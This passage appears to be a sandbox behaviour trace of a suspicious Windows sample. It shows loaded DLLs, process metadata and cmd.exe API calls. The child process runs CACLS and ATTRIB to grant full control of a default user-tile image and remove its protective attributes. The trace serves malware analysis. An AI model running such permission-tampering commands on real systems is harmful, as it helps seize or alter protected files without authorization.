0x76e0cfff entry_point = 
0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28019 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28020 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28021 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28022 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 28023 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28024 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 604 os_tid = 0xb48 Process: id = "426" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x8f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28025 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28026 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28027 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28028 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28029 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28030 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28031 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28032 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28033 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" 
Region: id = 28034 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28035 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28036 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28037 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28038 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28039 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 28040 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28041 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28042 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28043 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28044 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28045 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28046 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28047 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28048 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28049 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 28050 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28051 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28052 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28053 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28054 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000001e0000" filename = "" Region: id = 28055 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 28056 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 28057 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28058 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 28059 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 609 os_tid = 0x8f0 [0191.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9d4 | out: lpSystemTimeAsFileTime=0x1cf9d4*(dwLowDateTime=0xa6edec00, dwHighDateTime=0x1d440a9)) [0191.310] GetCurrentProcessId () returned 0x8f8 [0191.311] GetCurrentThreadId () returned 0x8f0 [0191.311] GetTickCount () returned 0x3673a [0191.311] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9cc | out: lpPerformanceCount=0x1cf9cc*=24809990976) returned 1 [0191.311] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.311] __set_app_type (_Type=0x1) [0191.311] __p__fmode () returned 0x76b331f4 [0191.311] __p__commode () returned 0x76b331fc [0191.311] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.312] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.312] GetCurrentThreadId () returned 0x8f0 [0191.312] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, 
dwThreadId=0x8f0) returned 0x38 [0191.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.312] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.312] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.312] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf964 | out: phkResult=0x1cf964*=0x0) returned 0x2 [0191.312] VirtualQuery (in: lpAddress=0x1cf99b, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0191.312] GetConsoleOutputCP () returned 0x1b5 [0191.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0191.313] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.313] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.313] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.313] GetEnvironmentStringsW () returned 0x280308* [0191.314] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.314] GetEnvironmentStringsW () returned 0x280308* [0191.314] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0xb8, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegCloseKey (hKey=0x40) returned 0x0 [0191.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegCloseKey (hKey=0x40) returned 0x0 [0191.315] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0191.315] srand (_Seed=0x5b886399) [0191.315] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" [0191.315] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" [0191.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0191.315] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.315] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0191.315] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0191.315] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0191.315] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0191.315] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0191.316] GetEnvironmentStringsW () returned 0x282458* [0191.316] FreeEnvironmentStringsW (penv=0x282458) returned 1 [0191.316] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.316] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.316] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0191.316] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0191.316] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0191.316] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0191.316] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0191.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf6a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.316] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf6a0, lpFilePart=0x1cf69c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf69c*="Desktop") returned 0x18 [0191.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.316] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.316] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.317] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.317] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.317] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0191.317] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0191.317] GetEnvironmentStringsW () returned 0x280308* [0191.317] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.317] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.318] GetConsoleOutputCP () returned 0x1b5 [0191.318] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.318] GetUserDefaultLCID () returned 0x409 [0191.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="1") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0191.319] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0191.320] GetConsoleTitleW (in: lpConsoleTitle=0x2709b8, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0191.321] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0191.321] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0191.321] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0191.321] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0191.321] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0191.321] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0191.321] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0191.321] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0191.324] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0191.324] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0191.324] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0191.324] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0191.324] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0191.324] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0191.324] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0191.326] GetConsoleTitleW (in: lpConsoleTitle=0x1cf474, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.326] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.326] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.326] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.326] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.326] _wcsicmp (_String1="CACLS", _String2="COPY") 
